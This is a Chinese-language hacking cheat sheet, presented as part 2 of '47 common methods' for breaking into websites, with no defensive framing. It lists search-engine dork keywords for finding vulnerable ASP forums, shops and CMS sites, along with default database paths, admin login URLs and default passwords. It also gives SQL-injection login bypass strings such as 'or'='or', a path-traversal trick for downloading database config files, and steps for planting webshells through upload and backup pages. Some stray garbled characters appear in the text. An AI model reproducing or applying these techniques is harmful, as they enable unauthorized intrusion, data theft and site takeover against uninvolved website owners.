黑客命令第16集:47种最常见的**网站方法2/2

31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能，否则您将不能登录
插入diy.asp
32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径
36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字owered byCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp
38.
**雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.
39.
关键字ower System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\
yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字：asp?id=1 gov.jp/ asp?id=
页数：100
语言：想**哪个国家就填什么语言吧
41.
关键字：Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录　进入
默认数据库地址atabase/DataShop.mdb
43.
关键字:六合彩 inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马
44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45.
关键字：程序核心：BJXSHOP网上开店专家
后台:/admin
46
批量**新云系统！
搜索关键词:关于本站 网站帮助 广告合作 下载声明 友情连接 网站
地图
找到以后缀添加:user/reg.asp
工具：啊D注入D_SQLTools2.0和COOKIES欺骗工具
先来注册 发布个文章 得到的地址用啊D扫下 他默认的表段名字是NC_admin
默认数据库: Databases/myszw.mdb Databases/myszw1.mdb
上传 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1

----------------------------------------------------
关键字：网站建设公司企业网站管理系统
后缀： admin/login.asp

---------------------------------------
关键字：网梦购物系统 gCS木马
GOOGLE里搜索关键字:
上面的这个名字只是该留言者使用的昵称,不代表任何管理员身份!
把index.asp换成 mdb/vcsbook.asp
代码：

---------------------------------------
关键子：inurl:Went.asp
后缀：manage/login.asp
密码：'or''=''or'
============================
关键字：acblog
blogdata/acblog.asa 默认数据库。
=======================================
关键字:Copyright ? 2005-2008??Power
然后写入默认数据库：databass/datashop.asp
在网址后面加上主页后面加上：linktianjia.asp
申请连接输入一句话代码：
或者点下面的管理入口 密码：'or'='or'
一句话连接的时候在网站后面加上：databass/datashop.asp
========================================================
关键词 co net mib ver 1.0 design by hypo
搜索网站 http://www.yahoo.cn
密码 'or'='or'
==============================================
新云漏洞：把/flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 找到数据库地址比如 www.123.com 这个站 那么数据库地址就是
http://www.123.com/database\xzws.mdb 大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了如:#xzws.mdb 改成%23xzws.mdb 那么数据库就是
http://www.123.com/database\%23xzws.mdb然后下载 数据库
======================================================
网站猎手 一句话木马
关键字：Powered by BBSXP 7.00
后缀：DataBase\BBSXP7.mdb
默认后台：/bbsxp/Login.asp
=====================================
关键字:Management Ver 3.0 Build 20030628
后缀：upload.asp
一：网站猎手 t0/fF'G ZD
二：明小子
三：ASP木马 =DUs
====================
密码：'or'='or'
搜索：WEB Manage Ver 1.0
LQT Ver 1.0 Design By wm 6
Web Development By Ver 1.0 Final
Web Management Ver 1.0 Design By Ck8
=====================================
edit.asp?table=
edit.asp?boardname=
action=
cnunews=
news_main&acode=
asp?id=1
asp?id=2
&idx=
edit.asp?idx=
啊D注入工具 百度搜索
=========================
搜索：Co Net MIB Ver 1.0网站后台管理系统
===============================================
用到工具:挖掘鸡
后缀添加:admin/login.asp
搜索关键词:申请会员有什么好处?
密码：'or'='or'
=================================
啊D注入工具--百度----关键子：admin
====================================
挖掘机关键字：Powered by WEBBOY页面：/upfile.asp
网站猎手关键字：Powered by mypower 后缀：upfile_photo.asp
upfile_softpic.asp
upfile_adpic.asp
======================
关键字：Power BY:VenShop V7.01 Copyright:VenShop.Com
密码：'or'='or'
======================= ;:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
===============================
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
=============================
网上搜索 inurl:manage/login.asp
======================================
关键字

ower BY:VenShop V7.01
后台地址:ad_login.asp
密码：'or'='or'
====================
关键字：Powered by WEBBOY
后缀：/upfile.asp
工具：明小子上传
====================
关键词：inurl: asp?=数字
inurl: php?=数字
===========================
关键字:went.asp
后缀：manage/login.asp
==========================
添加后缀/msmir_net.mdb
搜索：inurl:Msmir_DownLoads
===============================
关键字Powered By ：SMT Version 5.0
后缀：upfile_flash.asp
===========================
关键字：你要**的类别 inurl:asp
工具：啊D注入工具
==================================
========================================
一、**BBSXP系统：
用到的工具：网站猎手 数据库小助手 MD5密码破解工具
关键词：广告合作
管理员登陆地址：BBS主页
默认数据库地址：/DATABASE/BBSXP.MDB

-----------------------------------------
二、**动网论坛
用到工具：网站猎手 数据库小助手 MD5密码破解工具
关键词：powered by dvbbs
默认数据库地址：data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
或者/bbs/Data/dvbbs7.mdb
管理员登陆地址：BBS主页
默认管理员帐号密码：admin admin888

--------------------------------------
三、**新云系统
用到的工具：数据库小助手 MD5密码破解工具 挖掘鸡 ?N 6'*2{NT
eIEr\X4\~~
关键词：本站所提供的程序均来自于 Internet 所以无法保证下载后一定可以安装
管理员登陆地址：/admin/admin_login.asp U
默认数据库：database/#newasp.mdb（因为加了#在浏览器是无法连接的。所以我们要改成%23）
database/%23newasp.mdb
默认管理员帐号密码：admin admin
用到的工具：挖掘鸡，辅臣数据库浏览器，ASP大马小马。
关键字：推荐商品,导航分类,商城动态,购物指南,会员中心,在线留言
默认数据库：/shopxp/shopxp.mdb